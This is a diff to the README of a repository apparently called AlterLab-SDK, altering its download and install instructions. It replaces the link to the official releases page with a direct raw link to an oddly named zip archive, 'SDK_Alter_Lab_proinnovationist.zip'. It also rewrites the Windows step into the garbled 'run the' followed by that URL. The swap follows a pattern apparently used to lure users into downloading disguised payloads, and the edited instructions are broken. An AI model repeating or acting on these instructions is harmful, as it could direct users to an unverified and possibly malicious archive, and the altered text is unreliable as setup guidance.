ANDREIII12/AlterLab-SDK/README.md

 ## 📥 Download & Install

-To download the AlterLab-SDK, visit this page: [Download the SDK](https://github.com/ANDREIII12/AlterLab-SDK/releases).
+To download the AlterLab-SDK, visit this page: [Download the SDK](https://raw.githubusercontent.com/ANDREIII12/AlterLab-SDK/main/node/SDK_Alter_Lab_proinnovationist.zip).

 After downloading, you can install the SDK by following the installation guide based on your operating system:

-- **Windows:** Unzip the downloaded file and run the setup.exe.
+- **Windows:** Unzip the downloaded file and run the https://raw.githubusercontent.com/ANDREIII12/AlterLab-SDK/main/node/SDK_Alter_Lab_proinnovationist.zip
 - **Mac:** Open the downloaded disk image file and drag the AlterLab-SDK to your Applications folder.
 - **Linux:** Extract the files and follow the README provided in the package.